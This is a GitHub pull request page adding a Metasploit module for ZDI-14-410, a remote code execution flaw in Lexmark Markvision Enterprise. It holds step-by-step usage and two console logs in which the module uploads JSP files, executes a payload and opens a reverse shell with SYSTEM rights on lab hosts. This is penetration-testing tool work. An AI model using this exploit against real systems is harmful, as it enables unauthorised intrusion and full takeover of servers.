Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add module for ZDI-14-410 Lexmark Markvision Enterprise RCE #4476

Merged
merged 3 commits into from Jan 12, 2015
Merged

Add module for ZDI-14-410 Lexmark Markvision Enterprise RCE #4476

merged 3 commits into from Jan 12, 2015

Conversation

jvazquez-r7
Copy link
Contributor

Verification

  • Install Windows 2003 SP2
  • Install Lexmark markvision enterprise 2.0.0. It can be downloaded from: http://media.lexmark.com/www/package/markvision/MVE-2.0.0/MVE-2.0.0.exe
  • Verify which the webapp runs correctly on the port 9788/TCP
  • Run msfconsole
  • Use the module: use exploit/windows/http/lexmark_markvision_gfd_upload
  • set RHOST
  • run check, verify the target appears as vulnerable.
msf > use exploit/windows/http/lexmark_markvision_gfd_upload
msf exploit(lexmark_markvision_gfd_upload) > set rhost 172.16.158.133
rhost => 172.16.158.133
msf exploit(lexmark_markvision_gfd_upload) > check
[*] 172.16.158.133:9788 - The target appears to be vulnerable.
  • run exploit, verify you get a SYSTEM session back
msf exploit(lexmark_markvision_gfd_upload) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.133:9788 - Uploading info leak JSP 0YMi.jsp...
[+] 172.16.158.133:9788 - JSP successfully uploaded
[+] 172.16.158.133:9788 - Working directory found in C:\Program Files\Lexmark\Markvision Enterprise\tomcat
[*] 172.16.158.133:9788 - Uploading JSP payload Vs0EjhB.jsp...
[+] 172.16.158.133:9788 - JSP successfully uploaded
[*] 172.16.158.133:9788 - Executing payload...
[*] Command shell session 2 opened (172.16.158.1:4444 -> 172.16.158.133:1416) at 2014-12-29 10:39:20 -0600
/webapps/ROOT/0YMi.jsp Files\Lexmark\Markvision Enterprise\tomcat
/webapps/ROOT/Vs0EjhB.jsples\Lexmark\Markvision Enterprise\tomcat

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>echo 2591175977;echo czOhXOibvlvtseuiicWFVxoUIZMxyKfe
2591175977;echo czOhXOibvlvtseuiicWFVxoUIZMxyKfe

\webapps\ROOT\0YMi.jsp" & echo " ' >/dev/null;echo JnJfKaLXyYQfxXIoetfwrFGGJsFLyfDFrise\tomcaton Enterprise\tomcat
" ' >/dev/null;echo JnJfKaLXyYQfxXIoetfwrFGGJsFLyfDF

C:\WINDOWS\system32>
\webapps\ROOT\Vs0EjhB.jsp" & echo " ' >/dev/null;echo PkPxLUOwwZglussibtPGxrkXTdFyILterise\tomcaton Enterprise\tomcat
" ' >/dev/null;echo PkPxLUOwwZglussibtPGxrkXTdFyILte

C:\WINDOWS\system32>
C:\WINDOWS\system32>whoami
whoami
nt authority\system

@wchen-r7 wchen-r7 self-assigned this Jan 12, 2015
@wchen-r7
Copy link
Contributor 

msf exploit(lexmark_markvision_gfd_upload) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] 192.168.1.80:9788 - Uploading info leak JSP g5N6TXroDZorXiyBarikxaeunlv.jsp...
[+] 192.168.1.80:9788 - JSP successfully uploaded
[+] 192.168.1.80:9788 - Working directory found in C:\Program Files\Lexmark\Markvision Enterprise\tomcat
[*] 192.168.1.80:9788 - Uploading JSP payload SVZcZE5BejZbzYQ4nzTdUBzWJOX3.jsp...
[+] 192.168.1.80:9788 - JSP successfully uploaded
[*] 192.168.1.80:9788 - Executing payload...
[*] Command shell session 1 opened (192.168.1.64:4444 -> 192.168.1.80:1072) at 2015-01-12 10:43:33 -0600

@wchen-r7 wchen-r7 merged commit d2af956 into rapid7:master Jan 12, 2015
wchen-r7 added a commit that referenced this pull request Jan 12, 2015
@wchen-r7
Land #4476 - Lexmark MarkVision Enterprise Arbitrary File Upload
7876401
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@wchen-r7 wchen-r7

Labels
feature module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@jvazquez-r7 @wchen-r7